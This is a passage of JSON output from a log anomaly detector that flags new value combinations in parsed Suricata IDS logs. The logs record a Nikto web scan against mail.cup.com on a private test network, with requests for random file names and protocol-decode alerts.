"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":724402052941536,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.xbb\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.xbb\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.xbb", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.xbb", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46828, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":724402052941536,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 724402052941536, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.215801+0000\",\"flow_id\":724402052941536,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.217240 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46830 -> 192.168.10.154:80", "/parser/model/time": 1583349514.21724, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46830, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.217240 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46830 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.LOG", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.217384+0000\",\"flow_id\":2009838519995892,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.217384, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2009838519995892,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.LOG\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.LOG\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.LOG", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.LOG", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46830, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2009838519995892,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2009838519995892, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.217384+0000\",\"flow_id\":2009838519995892,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.218957 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46832 -> 192.168.10.154:80", "/parser/model/time": 1583349514.218957, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46832, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.218957 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46832 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.box", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.219129+0000\",\"flow_id\":1576347470812328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.219129, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1576347470812328,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.box\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.box\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.box", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.box", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46832, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1576347470812328,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1576347470812328, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.219129+0000\",\"flow_id\":1576347470812328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.220670 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46834 -> 192.168.10.154:80", "/parser/model/time": 1583349514.22067, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
